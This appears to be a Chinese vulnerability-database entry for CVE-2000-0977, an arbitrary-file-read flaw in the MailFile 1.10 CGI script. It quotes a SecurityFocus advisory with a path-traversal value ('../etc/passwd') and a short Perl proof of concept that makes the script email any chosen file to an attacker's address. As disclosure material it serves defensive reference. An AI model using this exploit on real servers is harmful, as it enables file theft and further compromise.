MailFile漏洞

MailFile漏洞

漏洞ID 1106040 漏洞类型 未知
发布时间 2000-10-11 更新时间 2005-10-12
图片[1]-MailFile漏洞-安全小百科CVE编号 CVE-2000-0977
图片[2]-MailFile漏洞-安全小百科CNNVD-ID CNNVD-200012-188
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-188
|漏洞详情
MailFile1.10版本中的mailfile.cgiCGI程序存在漏洞。远程攻击者可以通过规定POST请求中的”filename”参数中的目标文件名读取任意文件,然后该漏洞被电子邮件发送到”email”参数指定地址。
|漏洞EXP
source: http://www.securityfocus.com/bid/1807/info

OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of <i>any</i> readable user-specified files to an email address. When used normally, the web interface provides the user with the option to select files to send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the filename (eg "../../../../../../../../../etc/passwd"). The script also checks the value of the referrer when accepting submitted input from the form but fails to protect against this attack. If exploited, an attacker can read arbitrary files on the filesystem with the privileges of the webserver. This may lead to further compromise.

#!/usr/bin/perl

use HTTP::Request::Common;
use LWP::UserAgent;

$ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://domain/mailfile.cgi',
[real_name => 'value1',
email => 'value2',
filename => 'value3',
]);

--snip--

value3 = target filename
value2 = where to send the file to
value1 = username.. can be anything.
|参考资料

来源:BID
名称:1807
链接:http://www.securityfocus.com/bid/1807
来源:BUGTRAQ
名称:20001011MailFilePOSTVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-10/0172.html
来源:XF
名称:mailfile-post-file-read
链接:http://xforce.iss.net/static/5358.php

相关推荐: Check Point Firewall-1 HTTP代理服务器未授权协议访问漏洞

Check Point Firewall-1 HTTP代理服务器未授权协议访问漏洞 漏洞ID 1203848 漏洞类型 权限许可和访问控制 发布时间 2002-09-19 更新时间 2002-12-31 CVE编号 CVE-2002-2405 CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享